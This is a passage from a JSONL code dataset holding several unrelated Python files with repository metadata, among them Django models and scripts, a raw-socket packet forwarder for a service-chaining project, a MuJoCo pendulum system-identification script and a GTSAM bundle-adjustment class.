do(method='delete', data={'id': 13})\n\n# do(method='put', data={\n# 'id': 13, 'content': 'some cool new content', 'user': 1})\n\n# do(method='post', data={'content': 'some cool new content', 'user': 1})\n","repo_name":"devendew/django-api-tutorial","sub_path":"scripts/script_rest_framework.py","file_name":"script_rest_framework.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5219636466","text":"# -*- coding utf-8 -*-\n# @Time : 2021/8/2 16:37\n# @Author : donghao\n# @File : aio_test.py\n# @Desc : 测试 aiofiles 和普通 file 操作速度,只操作多个文件条件下,耗时:file < aiofiles\nimport asyncio\nimport aiofiles\nimport time\n\n\ndef write_files(index):\n with open(\"./history/test_{}.txt\".format(index), mode='r') as file:\n for _ in range(1000):\n # file.write(str(index) * 1000 + \"\\n\")\n file.read()\n\n\ndef write_many():\n start1 = time.time()\n for i in range(1, 10):\n write_files(i)\n time.sleep(5)\n print(\"同步耗时:\" + str(time.time() - start1))\n\n\nasync def async_write(index):\n async with aiofiles.open(\"./history/async_test_{}.txt\".format(index), mode='r') as file:\n for _ in range(1000):\n # await file.write(str(index) * 1000 + \"\\n\")\n await file.read()\n\nasync def async_write_many():\n start2 = time.time()\n for i in range(1, 10):\n asyncio.create_task(async_write(i))\n while len(asyncio.all_tasks()) > 1:\n await asyncio.sleep(5)\n print(\"异步耗时:\" + str(time.time() - start2))\n\n\nif __name__ == '__main__':\n write_many()\n asyncio.run(async_write_many())\n\n\n","repo_name":"dearloveeee/Sink","sub_path":"history/aio_test/test_aiofiles.py","file_name":"test_aiofiles.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29768829484","text":"\"\"\"\nmember application생성\n settings.AUTH_USER_MODEL모델 구현\n username, nickname\n이후 해당 settings.AUTH_USER_MODEL모델을 Post나 Comment에서 author나 user항목으로 참조\n\"\"\"\nimport re\nfrom django.conf import settings\nfrom django.db import models\nfrom django.urls import reverse\n\n\nclass Post(models.Model):\n # Django가 제공하는 기본 settings.AUTH_USER_MODEL와 연결되도록 수정\n author = models.ForeignKey(settings.AUTH_USER_MODEL)\n photo = models.ImageField(upload_to='post', blank=True)\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n my_comment = models.OneToOneField(\n 'Comment',\n blank=True,\n null=True,\n related_name='+'\n )\n like_users = models.ManyToManyField(\n settings.AUTH_USER_MODEL,\n related_name='like_posts',\n through='PostLike',\n )\n\n class Meta:\n ordering = ['-pk', ]\n\n def add_comment(self, user, content):\n # 자신을 post로 갖고, 전달받은 user를 author로 가지며\n # content를 content필드내용으로 넣는 Comment객체 생성\n return self.comment_set.create(author=user, content=content)\n\n # def add_tag(self,tag_name):\n # tag,tag_created = Tag.objects.get_or_create(name=tag_name)\n # if not self.tags.filter(id=tag.id).exists():\n # self.tags.add(tag)\n @property\n def like_count(self):\n # 자신을 like하고 있는 user수 리턴\n return self.like_users.count()\n\n\nclass PostLike(models.Model):\n post = models.ForeignKey(Post)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n created_date = models.DateTimeField(auto_now_add=True)\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(Post)\n author = models.ForeignKey(settings.AUTH_USER_MODEL)\n content = models.TextField()\n html_content = models.TextField(blank=True)\n tags = 
models.ManyToManyField('Tag')\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n like_users = models.ManyToManyField(\n settings.AUTH_USER_MODEL,\n through='CommentLike',\n related_name='like_comments',\n )\n\n def save(self, *args, **kwargs):\n self.make_html_content_and_add_tags()\n super().save(*args, **kwargs)\n\n def make_html_content_and_add_tags(self):\n # 해시태그에 해당하는 정규표현식\n p = re.compile(r'(#\\w+)')\n # findall메서드로 해시태그 문자열들을 가져옴\n tag_name_list = re.findall(p, self.content)\n # 기존 content(Comment내용)을 변수에 할당\n ori_content = self.content\n # 문자열들을 순회하며\n for tag_name in tag_name_list:\n # Tag객체를 가져오거나 생성, 생성여부는 쓰지않는 변수이므로 _처리\n tag, _ = Tag.objects.get_or_create(name=tag_name.replace('#', ''))\n # 기존 content의 내용을 변경\n change_tag = '{tag_name}'.format(\n # url=reverse('post:hashtag_post_list', args=[tag_name.replace('#', '')]),\n url=reverse('post:hashtag_post_list', kwargs={'tag_name': tag_name.replace('#', '')}),\n tag_name=tag_name\n )\n ori_content = re.sub(r'{}(?![<\\w])'.format(tag_name), change_tag, ori_content, count=1)\n # content에 포함된 Tag목록을 자신의 tags필드에 추가\n if not self.tags.filter(pk=tag.pk).exists():\n self.tags.add(tag)\n # 편집이 완료된 문자열을 html_content에 저장\n self.html_content = ori_content\n super().save(update_fields=['html_content'])\n\n\nclass CommentLike(models.Model):\n comment = models.ForeignKey(Comment)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n created_date = models.DateTimeField(auto_now_add=True)\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return 'Tag({})'.format(self.name)","repo_name":"junhokwon/instagram","sub_path":"django_app/post/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14598047249","text":"from simpleutil.config import cfg\nfrom simpleutil.utils import importutils\n\nfrom simpleservice.wsgi import router\nfrom simpleservice.wsgi.middleware import controller_return_response\n\nfrom fluttercomic import common\n\nfrom fluttercomic.plugin.platforms.base import PlatformsRequestPublic\n\nCONF = cfg.CONF\n\n\nclass Routers(router.RoutersBase):\n\n resource_name = 'fluttercomic_platform'\n\n def append_routers(self, mapper, routers=None):\n\n conf = CONF[common.NAME]\n\n controller = controller_return_response(PlatformsRequestPublic(), {})\n\n self._add_resource(mapper, controller,\n path='/%s/platforms' % common.NAME,\n get_action='platforms')\n\n\n for platform in conf.platforms:\n mod = 'fluttercomic.plugin.platforms.%s.controller' % platform.lower()\n module = importutils.import_module(mod)\n cls = getattr(module, '%sRequest' % platform.capitalize())\n ctrl_instance = cls()\n controller = controller_return_response(cls(), module.FAULT_MAP)\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s' % (common.NAME, platform.lower()),\n get_action='html')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s' % (common.NAME, platform.lower()),\n post_action='new')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s/{oid}' % (common.NAME, platform.lower()),\n post_action='notify')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s/{oid}' % (common.NAME, platform.lower()),\n get_action='esure')\n\n self._add_resource(mapper, controller,\n path='/%s/orders/platforms/%s/{oid}' % (common.NAME, platform.lower()),\n 
get_action='result')\n\n ctrl_instance.extrouters(self, mapper, controller)\n\n # self._add_resource(mapper, controller,\n # path='/%s/orders/gifts/%s' % (common.NAME, platform.lower()),\n # post_action='gift')\n","repo_name":"lolizeppelin/fluttercomic","sub_path":"fluttercomic/plugin/platforms/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44811161374","text":"def twoSum(numbers,target):\n l=0\n r=len(numbers)-1\n while l<r:\n cursum=numbers[l]+numbers[r]\n if cursum>target:\n r-=1\n elif cursum<target:\n l+=1\n else:\n return [l+1,r+1]\n\ndef twoSum1(numbers,target):\n r=len(numbers)-1\n while numbers[r]>target and r>1:\n numbers.pop()\n r-=1\n D={}\n print(r)\n for i in range(0,r+1):\n \n diff=target-numbers[i]\n \n if diff in D:\n if D[diff]!=i:\n return [D[diff]+1,i+1]\n D[numbers[i]]=i\nprint(twoSum([1,2,3,4,5,7,9,11],9))\nprint(twoSum1([1,2,3,4,5,7,9,11],9))\n\n","repo_name":"ChiragSinghai/450-Questions","sub_path":"Chirag/Leetcode_problem/167. Two Sum II - Input array is sorted.py","file_name":"167. Two Sum II - Input array is sorted.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44478130795","text":"# !/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n# @author: condi\n# @file: websocket_client.py\n# @time: 19-7-22 下午3:57\n\n\nfrom websocket import create_connection\n\n\n# 通过socket路由访问\nws = create_connection(\"ws://192.168.2.179:5022/api/v1/hello\")\nws.send(\"Hello, linyk3\")\n# ws.send(\"run_crawl\")\nresult = ws.recv()\nprint(result)\n# ws.close()\n\n\n","repo_name":"condilin/BMS","sub_path":"services/CZWCrawl/websocket_client.py","file_name":"websocket_client.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24028331335","text":"#!/usr/bin/env python\n\nimport struct\nimport sys,os\nimport socket\nimport binascii\n\nrawSocket=socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800))\n\nwhile True:\n\treceivedPacket=rawSocket.recv(2048)\n\n\t#Extrai o cabecalho Ethernet\n\t#ethernetHeader=receivedPacket[0:14]\n\t#ethrheader=struct.unpack(\"!6s6s2s\",ethernetHeader)\n\t#destinationMAC= binascii.hexlify(ethrheader[0])\n\t#sourceMAC= binascii.hexlify(ethrheader[1])\n\t#protocol= binascii.hexlify(ethrheader[2])\n\n\t#Extrai o cabecalho IP \n\tipHeader=receivedPacket[14:34]\n\tipHdr=struct.unpack(\"!12s4s4s\",ipHeader)\n\tdestinationIP=socket.inet_ntoa(ipHdr[2])\n\tsourceIP=socket.inet_ntoa(ipHdr[1])\n\tif sourceIP == \"10.10.10.10\": # Filtrar os pacotes que serao enviados\n\t\t# Printa na tela informacoes do pacote recebido\n\t\t# print \"Source IP: \" +sourceIP\n\t\t# print \"Destination IP: \"+destinationIP\n\t\t# print \"Destination MAC: \"+destinationMAC\n\t\t# print \"Source MAC: \"+sourceMAC\n\t\t# print \"Protocol: \"+protocol\n\t\t\n\t\t#Envia o pacote recebido de volta para a interface escolhida\n\t\ts = socket.socket(socket.PF_PACKET,socket.SOCK_RAW,socket.htons(0x0800))\n\t\ts.bind((\"eth2\", socket.htons(0x0800))) # Alterar para a interface que SFF recebera os pacotes\n\t\ts.send(receivedPacket)\n\t\t\n#################################################################################","repo_name":"nerds-ufes/sfc-dpdk","sub_path":"test/forward2.py","file_name":"forward2.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7878235765","text":"from os import path\nfrom xml.dom import NOT_FOUND_ERR\nfrom 
repository import sim\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np \n\n'''\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/lucas/.mujoco/mujoco210/bin\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib/nvidia\nexport LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libGLEW.so\n'''\n\nROOT_PATH = f\"{path.dirname(path.realpath(__file__))}\"\nsys.path.append(path.dirname(ROOT_PATH + '/repository'))\n\nMODEL_PATH = f\"{ROOT_PATH}/model/\"\n\ndef plot(x_serie, y_serie, c_map = 'viridis', title = 'title', x_label = 'x', y_label = 'y') -> None:\n '''Configurando e plotando o grafico'''\n\n cmap = mpl.colormaps[c_map] \n plt.set_cmap(cmap)\n\n plt.plot(x_serie, y_serie)\n\n plt.title(title)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n\n plt.show()\n\n\nclass controller():\n B = None\n A = None\n\n\n def __init__(self, output,input, nbd=1, nad=2) -> None:\n self.output = output\n self.input = input\n\n self.npts = len(self.output)\n self.nbd = nbd\n self.nad = nad\n\n def ols(self):\n Y = []\n phi = []\n\n for j in range(max(self.nad,self.nbd)+1, self.npts-1):\n phirow = []\n\n for i in range(self.nad):\n phirow.append(-self.output[j-i-1])\n\n for i in range(self.nbd+1):\n phirow.append(self.input[j-i-1])\n\n Y.append([self.output[j]])\n phi.append(phirow)\n\n Y = np.array(Y)\n phi = np.array(phi)\n theta, _, _, _ = np.linalg.lstsq(phi, Y, rcond=None)\n\n theta = theta.flatten()\n\n self.B = theta[self.nad:]\n self.A = np.concatenate(([1], theta[:self.nad]))\n\n # return self.B, self.A\nif __name__ == '__main__':\n\n simulation = sim.sim(MODEL_PATH,'furuta','motor_vertical','motor_vertical','haste_horizontal')\n\n steps, outputs, inputs = simulation.run(step_limit=20000, render=False) \n\n ctrl = controller(outputs, inputs)\n\n ctrl.ols()\n print('B/A model')\n print(f'B: {ctrl.B}', f'A: {ctrl.A}')\n\n plot(steps,outputs, x_label='Passos', y_label='Angulo vertical')\n plot(steps,inputs, x_label='Passos', y_label='Torque')\n\n\n\n\n","repo_name":"lukasfreitas/bkp_ic_2022","sub_path":"furuta.py","file_name":"furuta.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3630507781","text":"# coding:utf-8\nfrom flask import render_template, redirect, flash, url_for\nfrom . import admin\nfrom flask.ext.login import login_required\nfrom ..models import ArticleType, Source, article_types, Article\nfrom .forms import SubmitArticlesForm\nfrom .. 
import db\n\n\n@admin.route('/submit-articles', methods=['GET', 'POST'])\n@login_required\ndef submitArticles():\n form = SubmitArticlesForm()\n\n sources = [(s.id, s.name) for s in Source.query.all()]\n form.source.choices = sources\n types = [(t.id, t.name) for t in ArticleType.query.all()]\n form.types.choices = types\n\n if form.validate_on_submit():\n title = form.title.data\n source_id = form.source.data\n content = form.content.data\n type_id = form.types.data\n summary = form.summary.data\n\n source = Source.query.get(source_id)\n articleType = ArticleType.query.get(type_id)\n\n if source and articleType:\n article = Article(title=title, content=content, summary=summary,\n source=source, articleType=articleType)\n db.session.add(article)\n db.session.commit()\n flash(u'发表文章成功', 'success')\n article_id = Article.query.filter_by(title=title).first().id\n return redirect(url_for('main.articleDetails', ArticleType=ArticleType,\n article_types=article_types, id=article_id))\n if form.errors:\n flash(u'发表文章失败', 'danger')\n\n return render_template('admin/submit_articles.html', ArticleType=ArticleType,\n article_types=article_types, form=form)","repo_name":"zhushengwei/MyBlogs-one","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17907112424","text":"from math import sqrt\n# import sys\n# sys.stdin = open('input.txt', 'r')\n# sys.stdout = open('output.txt', 'w')\n\nt = int(input())\nfor _ in range(t):\n k = int(input())\n s = int(sqrt(k))\n r = s * s\n e = k - r\n if e == 0:\n print(s, 1)\n elif e <= s:\n print(e, s + 1)\n else:\n print(s + 1, 2 * s + 2 - e)","repo_name":"rifatblack/CodeForce","sub_path":"C. Infinity Table.py","file_name":"C. Infinity Table.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"14330431931","text":"import gtsam\nimport numpy as np\nfrom gtsam import symbol\nimport tqdm\n\nfrom DataDirectory import Data\nfrom utils import utills\n\nLAND_MARK_SYM = \"q\"\nCAMERA_SYM = \"c\"\nP3D_MAX_DIST = 80\n\n\nclass BundleWindow:\n\n BUNDLE_WINDOW_LST = []\n\n def __init__(self, first_key_frame, second_key_frame, frames_in_window): # Todo: add Rotation\n self.__first_key_frame = first_key_frame\n self.__second_key_frame = second_key_frame\n self.__bundle_len = 1 + second_key_frame - first_key_frame\n self.__frames_in_window = frames_in_window\n self.__computed_tracks = set()\n\n self.__optimizer = None\n self.__initial_estimate = gtsam.Values()\n self.__optimized_values = None\n self.__camera_sym = set() # {CAMERA_SYM + frame index : gtsam symbol} for example {\"q1\": symbol(q1, place)}\n self.__landmark_sym = set()\n\n self.__graph = gtsam.NonlinearFactorGraph()\n\n def create_factor_graph(self):\n #Todo: 1. Consider change this such that it will get the all tracks in the frame in the bundle and run all over them\n # instead of receive a track from each frame\n # 2. 
Check the change of getting the relative trans array instead of the relatiive to first\n gtsam_calib_mat = utills.create_gtsam_calib_cam_mat(utills.K)\n\n first_frame = self.__frames_in_window[0]\n\n # Compute first frame extrinsic matrix that takes a point at the camera coordinates and map it to\n # the world coordinates where \"world\" here means frame 0 of the whole movie coordinates\n first_frame_cam_to_world_ex_mat = utills.convert_ex_cam_to_cam_to_world(first_frame.get_ex_cam_mat()) # first cam -> world\n\n # For each frame - create initial estimation for it's pose\n cur_cam_pose = None\n for i, frame in enumerate(self.__frames_in_window):\n\n # Create camera symbol and update values dictionary\n left_pose_sym = symbol(CAMERA_SYM, frame.get_id())\n self.__camera_sym.add(left_pose_sym)\n\n # Initialize constraints for first pose\n if i == 0:\n # sigmas array: first 3 for angles second 3 for location\n # sigmas = np.array([10 ** -3, 10 ** -3, 10 ** -3, 10 ** -2, 10 ** -2, 10 ** -2])\n sigmas = np.array([(3 * np.pi / 180)**2] * 3 + [1.0, 0.3, 1.0])\n pose_uncertainty = gtsam.noiseModel.Diagonal.Sigmas(sigmas=sigmas) # todo: check choice of diagonal\n # Initial pose\n factor = gtsam.PriorFactorPose3(left_pose_sym, gtsam.Pose3(), pose_uncertainty)\n self.__graph.add(factor)\n\n # Compute transformation of : (world - > cur cam) * (first cam -> world) = first cam -> cur cam\n camera_relate_to_first_frame_trans = utills.compose_transformations(first_frame_cam_to_world_ex_mat, frame.get_ex_cam_mat())\n\n # Convert this transformation to: cur cam -> first cam\n cur_cam_pose = utills.convert_ex_cam_to_cam_to_world(camera_relate_to_first_frame_trans)\n self.__initial_estimate.insert(left_pose_sym, gtsam.Pose3(cur_cam_pose))\n\n gtsam_left_cam_pose = gtsam.Pose3(cur_cam_pose)\n\n # For each track create measurements factors\n tracks_in_frame = Data.DB.get_tracks_at_frame(first_frame.get_id())\n\n for track in tracks_in_frame:\n # Check that this track has bot been computed yet and that it's length is satisfied\n if track.get_id() in self.__computed_tracks or track.get_last_frame_ind() < self.__second_key_frame:\n continue\n\n # Create a gtsam object for the last frame for making the projection at the function \"add_factors\"\n gtsam_last_cam = gtsam.StereoCamera(gtsam_left_cam_pose, gtsam_calib_mat)\n self.add_factors(track, self.__first_key_frame, self.__second_key_frame, gtsam_last_cam, gtsam_calib_mat) # Todo: as before\n\n self.__computed_tracks.add(track.get_id())\n\n\n # def create_factor_graph(self):\n # # Todo: 1. Check this with rel trans\n # # instead of receive a track from each frame\n # # 2. 
Check the change of getting the relative trans array instead of the relatiive to first\n # gtsam_calib_mat = utills.create_gtsam_calib_cam_mat(utills.K)\n #\n # first_frame = self.__frames_in_window[0]\n #\n # # Compute first frame extrinsic matrix that takes a point at the camera coordinates and map it to\n # # the world coordinates where \"world\" here means frame 0 of the whole movie coordinates\n # rel_trans = Data.DB.get_relative_cam_trans()[self.__first_key_frame: self.__second_key_frame + 1]\n # cams_rel_to_bundle_first_cam = utills.convert_trans_from_rel_to_global(rel_trans)\n #\n # # For each frame - create initial estimation for it's pose\n # cur_cam_pose = None\n # for i, frame in enumerate(self.__frames_in_window):\n #\n # # Create camera symbol and update values dictionary\n # left_pose_sym = symbol(CAMERA_SYM, frame.get_id())\n # self.__camera_sym.add(left_pose_sym)\n #\n # # Initialize constraints for first pose\n # if i == 0:\n # # sigmas array: first 3 for angles second 3 for location\n # # sigmas = np.array([10 ** -3, 10 ** -3, 10 ** -3, 10 ** -2, 10 ** -2, 10 ** -2])\n # sigmas = np.array([(3 * np.pi / 180) ** 2] * 3 + [1.0, 0.3, 1.0])\n # pose_uncertainty = gtsam.noiseModel.Diagonal.Sigmas(sigmas=sigmas) # todo: check choice of diagonal\n # # Initial pose\n # factor = gtsam.PriorFactorPose3(left_pose_sym, gtsam.Pose3(), pose_uncertainty)\n # self.__graph.add(factor)\n #\n # # Convert this transformation to: cur cam -> first cam\n # cur_cam_pose = utills.convert_ex_cam_to_cam_to_world(cams_rel_to_bundle_first_cam[i])\n # self.__initial_estimate.insert(left_pose_sym, gtsam.Pose3(cur_cam_pose))\n #\n # gtsam_left_cam_pose = gtsam.Pose3(cur_cam_pose)\n #\n # # For each track create measurements factors\n # tracks_in_frame = Data.DB.get_tracks_at_frame(first_frame.get_id())\n #\n # for track in tracks_in_frame:\n # # Check that this track has bot been computed yet and that it's length is satisfied\n # if track.get_id() in self.__computed_tracks or track.get_last_frame_ind() < self.__second_key_frame:\n # continue\n #\n # # Create a gtsam object for the last frame for making the projection at the function \"add_factors\"\n # gtsam_last_cam = gtsam.StereoCamera(gtsam_left_cam_pose, gtsam_calib_mat)\n # self.add_factors(track, self.__first_key_frame, self.__second_key_frame, gtsam_last_cam,\n # gtsam_calib_mat) # Todo: as before\n #\n # self.__computed_tracks.add(track.get_id())\n\n\n def add_factors(self, track, first_frame_ind, last_frame_ind, gtsam_frame_to_triangulate_from, gtsam_calib_mat, frame_idx_triangulate=-1):\n \"\"\"\n At this mission we:\n 1. Randomize a track with len of track_len\n 2. Triangulate a point from the \"frame_idx_triangulate\" frame in the track\n 3. Projects it to all frames_in_window in the track\n 4. Computes their re projection error on each frame\n 5. 
Finally, plot the results\n \"\"\"\n\n frames_in_track = Data.DB.get_frames()[first_frame_ind: last_frame_ind + 1]\n\n # Track's locations in frames_in_window\n left_locations = track.get_left_locations_in_specific_frames(first_frame_ind, last_frame_ind)\n right_locations = track.get_right_locations_in_specific_frames(first_frame_ind, last_frame_ind)\n\n # Track's location at the Last frame for triangulations\n last_left_img_loc = left_locations[frame_idx_triangulate]\n last_right_img_loc = right_locations[frame_idx_triangulate]\n\n # Create Measures of last frame for the triangulation\n measure_xl, measure_xr, measure_y = last_left_img_loc[0], last_right_img_loc[0], last_left_img_loc[1]\n gtsam_stereo_point2_for_triangulation = gtsam.StereoPoint2(measure_xl, measure_xr, measure_y)\n\n # Triangulation from last frame\n gtsam_p3d = gtsam_frame_to_triangulate_from.backproject(gtsam_stereo_point2_for_triangulation)\n\n # Ignore tracks that their 3d point is far Todo: Maybe to add it with more than 100 - last check wasnt good\n # if utils.euclidean_dist_3d(gtsam_p3d, gtsam_frame_to_triangulate_from.pose().translation()) >= 100:\n # return\n\n # Add landmark symbol to \"values\" dictionary\n p3d_sym = symbol(LAND_MARK_SYM, track.get_id())\n self.__landmark_sym.add(p3d_sym)\n self.__initial_estimate.insert(p3d_sym, gtsam_p3d)\n\n for i, frame in enumerate(frames_in_track):\n\n # Measurement values\n measure_xl, measure_xr, measure_y = left_locations[i][0], right_locations[i][0], left_locations[i][1]\n gtsam_measurement_pt2 = gtsam.StereoPoint2(measure_xl, measure_xr, measure_y)\n\n # Factor creation\n projection_uncertainty = gtsam.noiseModel.Isotropic.Sigma(3, 1.0)\n factor = gtsam.GenericStereoFactor3D(gtsam_measurement_pt2, projection_uncertainty,\n symbol(CAMERA_SYM, frame.get_id()), p3d_sym, gtsam_calib_mat)\n\n # Add factor to the graph\n self.__graph.add(factor)\n\n def optimize(self):\n self.__optimizer = gtsam.LevenbergMarquardtOptimizer(self.__graph, self.__initial_estimate)\n self.__optimized_values = self.__optimizer.optimize()\n\n def update_optimization(self, values):\n self.__initial_estimate = values\n\n def graph_error(self, optimized=True):\n if not optimized:\n error = self.__graph.error(self.__initial_estimate)\n else:\n error = self.__graph.error(self.__optimized_values)\n\n return np.log(error) # Todo: here we returns the reprojection error probably\n\n def get_initial_estimate_values(self):\n return self.__initial_estimate\n\n def get_optimized_values(self):\n return self.__optimized_values\n\n def get_cameras_symbols_lst(self):\n return self.__camera_sym\n\n def get_landmarks_symbols_lst(self):\n return self.__landmark_sym\n\n def get_optimized_cameras_poses(self):\n cameras_poses = []\n for camera_sym in self.__camera_sym:\n cam_pose = self.__optimized_values.atPose3(camera_sym)\n cameras_poses.append(cam_pose)\n\n return cameras_poses\n\n def get_optimized_cameras_p3d_version2(self):\n cameras_poses = []\n for camera_sym in self.__camera_sym:\n cam_pose = self.__optimized_values.atPose3(camera_sym)\n cameras_poses.append([cam_pose.x(), cam_pose.y(), cam_pose.z()])\n\n return cameras_poses\n\n def get_optimized_cameras_p3d(self):\n cam_pose = self.__optimized_values.atPose3(symbol(CAMERA_SYM, self.__second_key_frame))\n return cam_pose\n\n def get_optimized_landmarks_p3d(self):\n landmarks = []\n for landmark_sym in self.__landmark_sym:\n landmark = self.__optimized_values.atPoint3(landmark_sym)\n landmarks.append(landmark)\n\n return landmarks\n\n def 
get_initial_estimate_cameras_p3dversion2(self):\n cameras_poses = []\n for camera_sym in self.__camera_sym:\n cam_pose = self.__initial_estimate.atPose3(camera_sym)\n cameras_poses.append([cam_pose.x(), cam_pose.y(), cam_pose.z()])\n\n return cameras_poses\n\n def get_initial_estimate_cameras_p3d(self):\n cam_pose = self.__initial_estimate.atPose3(symbol(CAMERA_SYM, self.__second_key_frame)).inverse()\n return cam_pose\n\n def get_initial_estimate_landmarks_p3d(self):\n landmarks = []\n for landmark_sym in self.__landmark_sym:\n landmark = self.__initial_estimate.atPoint3(landmark_sym)\n landmarks.append(landmark)\n\n return landmarks\n\n def get_key_frames(self):\n return self.__first_key_frame, self.__second_key_frame\n\n # Todo: Left for further checking\n\n # def create_factor_graph_all_tracks(self):\n # gtsam_calib_mat = ex5.create_gtsam_calib_cam_mat(utils.K)\n # # # Create gtsam objects for each frame\n #\n # first_frame = self.__frames_in_window[0]\n # # first_frame_global_cam_to_world_trans = gtsam.Pose3(first_frame.get_ex_cam_mat()).inverse() # Trans from camera to world\n #\n # first_frame_cam_to_world_ex_mat = ex5.convert_ex_cam_to_cam_to_world(first_frame.get_ex_cam_mat()) # first cam -> world\n #\n # cur_cam_pose = None\n # # Add projections factors for each frame - \"camera\"\n # for i, frame in enumerate(self.__frames_in_window):\n #\n # # Create camera symbol and update values dictionary\n # left_pose_sym = symbol(CAMERA_SYM, frame.get_id())\n # self.__camera_sym.add(left_pose_sym)\n #\n # # Initialize constraints for first pose\n # if i == 0:\n # # sigmas array: first 3 for location second 3 for angles\n # pose_uncertainty = gtsam.noiseModel.Diagonal.Sigmas(sigmas=np.array(\n # [10 ** -3, 10 ** -3, 10 ** -3, 10 ** -2, 10 ** -2, 10 ** -2])) # todo: check choice of diagonal\n # # Initial pose\n # factor = gtsam.PriorFactorPose3(left_pose_sym, gtsam.Pose3(), pose_uncertainty)\n # self.__graph.add(factor)\n #\n # # camera_relate_to_first_frame_trans = first_frame_global_cam_to_world_trans.between(gtsam.Pose3(frame.get_ex_cam_mat()).inverse())\n #\n # # Compute transformation of : (world - > cur cam) * (first cam -> world) = first cam -> cur cam\n # camera_relate_to_first_frame_trans = utils.compose_transformations(first_frame_cam_to_world_ex_mat, frame.get_ex_cam_mat())\n #\n # cur_cam_pose = ex5.convert_ex_cam_to_cam_to_world(camera_relate_to_first_frame_trans) # cur cam -> first cam\n # self.__initial_estimate.insert(left_pose_sym, gtsam.Pose3(cur_cam_pose))\n #\n # gtsam_left_cam_pose = gtsam.Pose3(cur_cam_pose)\n # # For each track create measurements factors\n #\n # for i, frame in enumerate(self.__frames_in_window):\n #\n # tracks_in_frame = self.db.get_tracks_at_frame(frame.get_id())\n #\n # for track in tracks_in_frame:\n # if track.get_id() in self.__computed_tracks or track.get_last_frame_ind() < self.__second_key_frame + i:\n # continue\n #\n # gtsam_last_cam = gtsam.StereoCamera(gtsam_left_cam_pose, gtsam_calib_mat)\n # self.add_factors(track, frame.get_id(), self.__second_key_frame, gtsam_last_cam, gtsam_calib_mat) # Todo: as before\n #\n # self.__computed_tracks.add(track.get_id())\n","repo_name":"maoratar1/VAN_ex_old","sub_path":"BundleAdjustmentDirectory/BundleWindow.py","file_name":"BundleWindow.py","file_ext":"py","file_size_in_byte":15034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31463437358","text":"import time\r\nimport datetime\r\nimport logging\r\nfrom pathlib import Path\r\n\r\nimport 
gprMax\r\nfrom gprMax.exceptions import GeneralError\r\n\r\n\r\ndef setup_logger(filename_base: str, timestamp: str) -> logging.Logger:\r\n \"\"\"Sets up a `Logger` object for diagnostic and debug\r\n\r\n A standard function to set up and configure a Python `Logger` object\r\n for recording diagnostic and debug data.\r\n\r\n Args:\r\n filename_base: A `str` containing a user-supplied filename to better\r\n identify the logs.\r\n timestamp: A `str` with the date and time the logger was started\r\n to differentiate between different runs\r\n\r\n Returns:\r\n A `Logger` object with appropriate configurations. All the messages\r\n are duplicated to the command prompt as well.\r\n\r\n Raises:\r\n Nothing\r\n \"\"\"\r\n log_filename = \"_\".join([timestamp, filename_base])\r\n log_filename = \".\".join([log_filename, \"log\"])\r\n\r\n logger = logging.getLogger(filename_base)\r\n\r\n logger_handler = logging.FileHandler(log_filename)\r\n logger_handler.setLevel(logging.DEBUG)\r\n\r\n fmt_string = \"{asctime:s} {msecs:.3f} \\t {levelname:^10s} \\t {message:s}\"\r\n datefmt_string = \"%Y-%m-%d %H:%M:%S\"\r\n logger_formatter = logging.Formatter(\r\n fmt=fmt_string, datefmt=datefmt_string, style=\"{\"\r\n )\r\n\r\n # * This is to ensure consistent formatting of the miliseconds field\r\n logger_formatter.converter = time.gmtime\r\n\r\n logger_handler.setFormatter(logger_formatter)\r\n logger.addHandler(logger_handler)\r\n\r\n # * This enables the streaming of messages to stdout\r\n logging.basicConfig(\r\n format=fmt_string,\r\n datefmt=datefmt_string,\r\n style=\"{\",\r\n level=logging.DEBUG,\r\n )\r\n logger.info(\"Logger configuration done\")\r\n\r\n return logger\r\n\r\n\r\nglobal_timestamp = 